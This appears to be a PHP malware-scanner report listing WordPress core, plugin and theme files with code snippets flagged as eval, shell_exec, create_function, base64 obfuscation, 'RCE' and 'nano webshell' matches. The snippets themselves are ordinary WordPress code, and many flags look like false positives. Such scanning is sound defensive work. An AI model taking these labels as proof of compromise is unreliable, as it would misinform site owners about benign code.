<?php create_function('', 'return "text/html"; ')); } else { add_filter('wp_mail_content_type', create_function('', 'return "text/plain"; ')); } global $easycontactforms_request; $easycontactforms_request->attachment = $attachments; wp_mail($emaillist, $message->subject, $message->body, $headers); } function processHistory($fieldvalues, $type, $oid, $uid) { $object = EasyContactFormsClassLoader::getObject($type, TRUE, $oid); $is_st_changed = isset($fieldvalues->Status) && ($fieldvalues->Status != $obj...

/custdata01/kings/.trash/wp-content/plugins/wp-super-cache/wp-cache-phase1.php

Size: 24.59 kB Created: 2016-06-12 22:16:10 Modified: 2017-03-24 23:56:10 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval( '?>' . $cachefiledata . '<?php ' ); echo "\n<!-- Compression = gzip -->\n"; ob_end_flush(); if ( isset( $wp_super_cache_debug ) && $wp_super_cache_debug ) wp_cache_debug( "Served compressed dynamic page from supercache file using PHP. File: $file", 5 ); } else { eval( '?>' . $cachefiledata . '<?php ' ); if ( isset( $wp_super_cache_debug ) && $wp_super_cache_debug ) wp_cache_debug( "Served dynamic page from supercache file using PHP. File: $file", 5 ); } exit(); } } else { if ( isset( $wp_s...

/custdata01/kings/.trash/wp-content/plugins/wp-super-cache/wp-cache.php

Size: 181.34 kB Created: 2016-06-12 22:16:10 Modified: 2017-03-24 23:56:10 Dangers: 1
DescriptionMatch

Exploit execution Line: 2195 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php base64_decode( $_GET[ 'uri' ] )

/custdata01/kings/.trash/wp-content/themes/SimplePress/epanel/import_settings.php

Size: 8.27 kB Created: 2016-06-12 22:16:40 Modified: 2017-03-24 23:56:11 Warns: 1
DescriptionMatch

Exploit base64_long Line: 48 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'YToxMDA6e3M6MDoiIjtOO3M6MTY6InNpbXBsZXByZXNzX2xvZ28iO3M6MDoiIjtzOjE5OiJzaW1wbGVwcmVzc19mYXZpY29uIjtzOjA6IiI7czoyNDoic2ltcGxlcHJlc3NfY29sb3Jfc2NoZW1lIjtzOjc6IkRlZmF1bHQiO3M6MjI6InNpbXBsZXByZXNzX2Jsb2dfc3R5bGUiO047czoyMjoic2ltcGxlcHJlc3NfZ3JhYl9pbWFnZSI7TjtzOjI0OiJzaW1wbGVwcmVzc19jYXRudW1fcG9zdHMiO3M6MToiNiI7czoyODoic2ltcGxlcHJlc3NfYXJjaGl2ZW51bV9wb3N0cyI7czoxOiI1IjtzOjI3OiJzaW1wbGVwcmVzc19zZWFyY2hudW1fcG9zdHMiO3M6MToiNSI7czoyNDoic2ltcGxlcHJlc3NfdGFnbnVtX3Bvc3RzIjtzOjE6IjUiO3M6MjU6InNpbXBsZXByZXN...

/custdata01/kings/.trash/wp-includes/SimplePie/Parse/Date.php

Size: 19.22 kB Created: 2016-06-12 22:16:22 Modified: 2017-03-24 23:56:19 Warns: 1
DescriptionMatch

Exploit concat_vars_with_spaces Line: 786 Warning

Concatenation of vars technique is usually used for the obfuscation of malicious code

<?php $day . $fws . $month . $fws . $year . $fws .

/custdata01/kings/.trash/wp-includes/Text/Diff/Engine/native.php

Size: 15.47 kB Created: 2016-06-12 22:17:46 Modified: 2017-03-24 23:56:19 Warns: 1
DescriptionMatch

Function assert Warning

Potentially dangerous function `assert`

[https://www.php.net/assert]

<?php assert($yi < $n_to || $this->xchanged[$xi]); assert($xi < $n_from || $this->ychanged[$yi]); $copy = array(); while ($xi < $n_from && $yi < $n_to && !$this->xchanged[$xi] && !$this->ychanged[$yi]) { $copy[] = $from_lines[$xi++]; ++$yi; } if ($copy) { $edits[] = &new Text_Diff_Op_copy($copy); } $delete = array(); while ($xi < $n_from && $this->xchanged[$xi]) { $delete[] = $from_lines[$xi++]; } $add = array(); while ($yi < $n_to && $this->ychanged[$yi]) { $add[] = $to_lines[$yi++]; } if ($delete &&...

/custdata01/kings/.trash/wp-includes/Text/Diff/Engine/shell.php

Size: 5.05 kB Created: 2016-06-12 22:17:46 Modified: 2017-03-24 23:56:19 Warns: 2
DescriptionMatch

Function assert Warning

Potentially dangerous function `assert`

[https://www.php.net/assert]

<?php assert('$match[1] - $from_line_no == $match[4] - $to_line_no'); array_push($edits, new Text_Diff_Op_copy( $this->_getLines($from_lines, $from_line_no, $match[1] - 1), $this->_getLines($to_lines, $to_line_no, $match[4] - 1))); } switch ($match[3]) { case 'd': array_push($edits, new Text_Diff_Op_delete( $this->_getLines($from_lines, $from_line_no, $match[2]))); $to_line_no++; break; case 'c': array_push($edits, new Text_Diff_Op_change( $this->_getLines($from_lines, $from_line_no, $match[2]), $this...

Function shell_exec Warning

Potentially dangerous function `shell_exec`

[https://www.php.net/shell_exec]

<?php shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file); unlink($from_file); unlink($to_file); if (is_null($diff)) { return array(new Text_Diff_Op_copy($from_lines)); } $from_line_no = 1; $to_line_no = 1; $edits = array(); preg_match_all('#^(\d+)(?:,(\d+))?([adc])(\d+)(?:,(\d+))?$#m', $diff, $matches, PREG_SET_ORDER); foreach ($matches as $match) { if (!isset($match[5])) { $match[5] = false; } if ($match[3] == 'a') { $from_line_no--; } if ($match[3] == 'd') { $to_line_no--; } if ($fr...

/custdata01/kings/.trash/wp-includes/Text/Diff.php

Size: 11.66 kB Created: 2016-06-12 22:16:04 Modified: 2017-03-24 23:56:19 Warns: 1
DescriptionMatch

Function assert Warning

Potentially dangerous function `assert`

[https://www.php.net/assert]

<?php assert(count($from_lines) == count($mapped_from_lines)); assert(count($to_lines) == count($mapped_to_lines)); parent::Text_Diff($mapped_from_lines, $mapped_to_lines); $xi = $yi = 0; for ($i = 0; $i < count($this->_edits); $i++) { $orig = &$this->_edits[$i]->orig; if (is_array($orig)) { $orig = array_slice($from_lines, $xi, count($orig)); $xi += count($orig); } $final = &$this->_edits[$i]->final; if (is_array($final)) { $final = array_slice($to_lines, $yi, count($final)); $yi += count($final); } ...

/custdata01/kings/.trash/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php

Size: 2.78 kB Created: 2016-06-12 22:18:53 Modified: 2017-03-24 23:56:20 Warns: 1 Dangers: 1
DescriptionMatch

Function shell_exec Warning

Potentially dangerous function `shell_exec`

[https://www.php.net/shell_exec]

<?php shell_exec($cmd); @unlink($this->_tmpfile); $returnData = array(); $dataArr = preg_split("/[\r\n]/", $data, -1, PREG_SPLIT_NO_EMPTY); foreach ($dataArr as $dstr) { $matches = array(); if ($dstr[0] == "@") continue; preg_match("/(\&|#) ([^ ]+) .*/i", $dstr, $matches); if (!empty($matches[2])) $returnData[] = utf8_encode(trim($matches[2])); } return $returnData; } function &getSuggestions($lang, $word) { $cmd = $this->_getCMD($lang); if (function_exists("mb_convert_encoding")) $word = mb_convert_e...

Sign 963e968a Line: 110 Dangerous

Malware Signature (hash: 963e968a)

<?php php_uname()

/custdata01/kings/.trash/wp-includes/js/tinymce/plugins/spellchecker/rpc.php

Size: 2.82 kB Created: 2016-06-12 22:18:12 Modified: 2017-03-24 23:56:20 Dangers: 1
DescriptionMatch

Exploit nano Line: 97 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

<?php $config['general.engine']($config)

/custdata01/kings/.trash/wp-includes/pomo/po.php

Size: 11.22 kB Created: 2016-06-12 22:16:02 Modified: 2017-03-24 23:56:21 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function('$x', "return $php_with.\$x;"), $lines)); if ("\n" == substr($string, -1)) $res .= "\n"; return $res; } function comment_block($text, $char=' ') { $text = wordwrap($text, PO_MAX_LINE_LEN - 3); return PO::prepend_each_line($text, "#$char "); } function export_entry(&$entry) { if (is_null($entry->singular)) return false; $po = array(); if (!empty($entry->translator_comments)) $po[] = PO::comment_block($entry->translator_comments); if (!empty($entry->extracted_comments)) $po[] = PO:...

/custdata01/kings/.trash/wp-includes/pomo/translations.php

Size: 7.36 kB Created: 2016-06-12 22:16:02 Modified: 2017-03-24 23:56:21 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function('$n', $func_body); } function parenthesize_plural_exression($expression) { $expression .= ';'; $res = ''; $depth = 0; for ($i = 0; $i < strlen($expression); ++$i) { $char = $expression[$i]; switch ($char) { case '?': $res .= ' ? ('; $depth++; break; case ':': $res .= ') : ('; break; case ';': $res .= str_repeat(')', $depth) . ';'; $depth= 0; break; default: $res .= $char; } } return rtrim($res, ';'); } function make_headers($translation) { $headers = array(); $translation = str_r...

/custdata01/kings/.trash/wp-includes/atomlib.php

Size: 10.67 kB Created: 2016-06-12 22:15:42 Modified: 2017-03-24 23:56:19 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function('$k,$v', 'return "$k=\"$v\"";'); $this->map_xmlns_func = create_function('$p,$n', '$xd = "xmlns"; if(strlen($n[0])>0) $xd .= ":{$n[0]}"; return "{$xd}=\"{$n[1]}\"";'); } function _p($msg) { if($this->debug) { print str_repeat(" ", $this->depth * $this->indent) . $msg ."\n"; } } function error_handler($log_level, $log_text, $error_file, $error_line) { $this->error = $log_text; } function parse() { set_error_handler(array(&$this, 'error_handler')); array_unshift($this->ns_contexts,...

/custdata01/kings/.trash/wp-includes/category-template.php

Size: 36.86 kB Created: 2016-06-12 22:15:42 Modified: 2017-03-24 23:56:19 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

<?php create_function('$count', $body); } $args = wp_parse_args( $args, $defaults ); extract( $args ); if ( empty( $tags ) ) return; $tags_sorted = apply_filters( 'tag_cloud_sort', $tags, $args ); if ( $tags_sorted != $tags ) { $tags = $tags_sorted; unset($tags_sorted); } else { if ( 'RAND' == $order ) { shuffle($tags); } else { if ( 'name' == $orderby ) uasort( $tags, '_wp_object_name_sort_cb' ); else uasort( $tags, '_wp_object_count_sort_cb' ); if ( 'DESC' == $order ) $tags = array_reverse( $tags, t...

/custdata01/kings/.trash/wp-includes/class-snoopy.php

Size: 36.89 kB Created: 2016-06-12 22:15:43 Modified: 2017-03-24 23:56:19 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

<?php exec($this->curl_path." -k -D \"$headerfile\"".$cmdline_params." \"".escapeshellcmd($URI)."\"",$results,$return); if($return) { $this->error = "Error: cURL could not retrieve the document, error $return."; return false; } $results = implode("\r\n",$results); $result_headers = file("$headerfile"); $this->_redirectaddr = false; unset($this->headers); for($currentHeader = 0; $currentHeader < count($result_headers); $currentHeader++) { if(preg_match("/^(Location: |URI: )/i",$result_headers[$currentH...

/custdata01/kings/.trash/wp-includes/pluggable.php

Size: 58.71 kB Created: 2016-06-12 22:15:46 Modified: 2017-03-24 23:56:19 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 798 Dangerous

Malware Signature (hash: 11413268)

<?php exploit

/custdata01/kings/.trash/wp-includes/kses.php

Size: 40.31 kB Created: 2016-06-12 22:15:45 Modified: 2017-03-24 23:56:19 Dangers: 1
DescriptionMatch

Sign 1414e381 Line: 748 Dangerous

Malware Signature (hash: 1414e381)

<?php $mode = 0;
    $attrname = '';
    $uris = array('xmlns', 'profile', 'href', 'src', 'cite', 'classid', 'codebase', 'data', 'usemap', 'longdesc',